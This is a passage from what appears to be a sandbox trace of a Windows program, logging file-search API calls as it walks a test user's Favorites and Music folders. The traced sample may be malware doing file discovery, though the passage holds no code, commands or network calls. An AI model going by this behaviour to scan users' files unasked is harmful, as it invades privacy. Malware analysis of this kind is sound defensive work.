HALPmcxz\\" [0165.850] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.850] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.850] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.850] PathFindFileNameW (pszPath="") returned="" [0165.850] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.852] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0165.852] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.852] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0165.852] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0165.852] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0165.852] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0165.852] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0165.852] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0165.852] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.853] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.853] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed88 | out: hHeap=0xcd0000) returned 1 [0165.853] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.854] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0165.854] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0165.854] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.854] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.854] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.854] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.854] PathFindFileNameW (pszPath="") returned="" [0165.854] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.856] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.856] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0165.856] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0165.856] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0165.856] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0165.856] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0165.856] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0165.856] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0165.856] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.857] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.857] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0165.857] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0165.857] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.857] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.857] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.857] PathFindFileNameW (pszPath="") returned="" [0165.858] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.859] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.859] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0165.859] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0165.859] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0165.859] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0165.859] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0165.859] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.859] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.859] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\") returned="D99YKJDL-0LajD\\" [0165.859] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0165.859] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.859] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.859] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.859] PathFindFileNameW (pszPath="") returned="" [0165.859] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6e99320, ftCreationTime.dwHighDateTime=0x1d5e2fe, ftLastAccessTime.dwLowDateTime=0xc7aff4c0, ftLastAccessTime.dwHighDateTime=0x1d5e2f5, ftLastWriteTime.dwLowDateTime=0xc7aff4c0, ftLastWriteTime.dwHighDateTime=0x1d5e2f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.860] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6e99320, ftCreationTime.dwHighDateTime=0x1d5e2fe, ftLastAccessTime.dwLowDateTime=0xc7aff4c0, ftLastAccessTime.dwHighDateTime=0x1d5e2f5, ftLastWriteTime.dwLowDateTime=0xc7aff4c0, ftLastWriteTime.dwHighDateTime=0x1d5e2f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.860] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0f6b2f0, ftCreationTime.dwHighDateTime=0x1d5dca9, ftLastAccessTime.dwLowDateTime=0xe8afc330, ftLastAccessTime.dwHighDateTime=0x1d5dc8d, ftLastWriteTime.dwLowDateTime=0xe8afc330, ftLastWriteTime.dwHighDateTime=0x1d5dc8d, nFileSizeHigh=0x0, nFileSizeLow=0xba8c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7q9Uuf7p.mp3", cAlternateFileName="")) returned 1 [0165.860] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x864690e0, ftCreationTime.dwHighDateTime=0x1d5e3f2, ftLastAccessTime.dwLowDateTime=0x5eef0d00, ftLastAccessTime.dwHighDateTime=0x1d5de12, ftLastWriteTime.dwLowDateTime=0x5eef0d00, ftLastWriteTime.dwHighDateTime=0x1d5de12, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9yc_4THt2yLG_luCDjCt", cAlternateFileName="9YC_4T~1")) returned 1 [0165.860] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c4cc9f0, ftCreationTime.dwHighDateTime=0x1d5e1c6, ftLastAccessTime.dwLowDateTime=0x7aadf700, ftLastAccessTime.dwHighDateTime=0x1d5e0c8, ftLastWriteTime.dwLowDateTime=0x7aadf700, ftLastWriteTime.dwHighDateTime=0x1d5e0c8, nFileSizeHigh=0x0, nFileSizeLow=0xc632, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BVm 0I0y19-I.wav", cAlternateFileName="BVM0I0~1.WAV")) returned 1 [0165.860] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45fcc6d0, ftCreationTime.dwHighDateTime=0x1d5e7ad, ftLastAccessTime.dwLowDateTime=0xcbcf3fe0, ftLastAccessTime.dwHighDateTime=0x1d5dac4, ftLastWriteTime.dwLowDateTime=0xcbcf3fe0, ftLastWriteTime.dwHighDateTime=0x1d5dac4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZxH6", cAlternateFileName="")) returned 1 [0165.860] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45fcc6d0, ftCreationTime.dwHighDateTime=0x1d5e7ad, ftLastAccessTime.dwLowDateTime=0xcbcf3fe0, ftLastAccessTime.dwHighDateTime=0x1d5dac4, ftLastWriteTime.dwLowDateTime=0xcbcf3fe0, ftLastWriteTime.dwHighDateTime=0x1d5dac4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZxH6", cAlternateFileName="")) returned 0 [0165.860] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.860] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.860] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\") returned="DENcIRfHVVVix5\\" [0165.860] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0165.860] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.860] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.860] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.860] PathFindFileNameW (pszPath="") returned="" [0165.860] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d0ec80, ftCreationTime.dwHighDateTime=0x1d5df00, ftLastAccessTime.dwLowDateTime=0xe45dc290, ftLastAccessTime.dwHighDateTime=0x1d5e71f, ftLastWriteTime.dwLowDateTime=0xe45dc290, ftLastWriteTime.dwHighDateTime=0x1d5e71f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.860] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d0ec80, ftCreationTime.dwHighDateTime=0x1d5df00, ftLastAccessTime.dwLowDateTime=0xe45dc290, ftLastAccessTime.dwHighDateTime=0x1d5e71f, ftLastWriteTime.dwLowDateTime=0xe45dc290, ftLastWriteTime.dwHighDateTime=0x1d5e71f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.860] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cbdebb0, ftCreationTime.dwHighDateTime=0x1d5df64, ftLastAccessTime.dwLowDateTime=0xb8877a50, ftLastAccessTime.dwHighDateTime=0x1d5e321, ftLastWriteTime.dwLowDateTime=0xb8877a50, ftLastWriteTime.dwHighDateTime=0x1d5e321, nFileSizeHigh=0x0, nFileSizeLow=0xa56a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H97IrW ql.wav", cAlternateFileName="H97IRW~1.WAV")) returned 1 [0165.861] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde8c36a0, ftCreationTime.dwHighDateTime=0x1d5e718, ftLastAccessTime.dwLowDateTime=0xb0e02dc0, ftLastAccessTime.dwHighDateTime=0x1d5dd58, ftLastWriteTime.dwLowDateTime=0xb0e02dc0, ftLastWriteTime.dwHighDateTime=0x1d5dd58, nFileSizeHigh=0x0, nFileSizeLow=0xb0ba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KdAWNP-F.mp3", cAlternateFileName="")) returned 1 [0165.861] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x639b7db0, ftCreationTime.dwHighDateTime=0x1d5e51b, ftLastAccessTime.dwLowDateTime=0xf1574a90, ftLastAccessTime.dwHighDateTime=0x1d5dc28, ftLastWriteTime.dwLowDateTime=0xf1574a90, ftLastWriteTime.dwHighDateTime=0x1d5dc28, nFileSizeHigh=0x0, nFileSizeLow=0x8958, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="M2WH.wav", cAlternateFileName="")) returned 1 [0165.861] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94653770, ftCreationTime.dwHighDateTime=0x1d5df1b, ftLastAccessTime.dwLowDateTime=0xfd25f6a0, ftLastAccessTime.dwHighDateTime=0x1d5e7b8, ftLastWriteTime.dwLowDateTime=0xfd25f6a0, ftLastWriteTime.dwHighDateTime=0x1d5e7b8, nFileSizeHigh=0x0, nFileSizeLow=0xb924, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TyBhlhBVzmcnSF.wav", cAlternateFileName="TYBHLH~1.WAV")) returned 1 [0165.861] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94653770, ftCreationTime.dwHighDateTime=0x1d5df1b, ftLastAccessTime.dwLowDateTime=0xfd25f6a0, ftLastAccessTime.dwHighDateTime=0x1d5e7b8, ftLastWriteTime.dwLowDateTime=0xfd25f6a0, ftLastWriteTime.dwHighDateTime=0x1d5e7b8, nFileSizeHigh=0x0, nFileSizeLow=0xb924, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TyBhlhBVzmcnSF.wav", cAlternateFileName="TYBHLH~1.WAV")) returned 0 [0165.861] FindClose (in: hFindFile=0x362b660 | 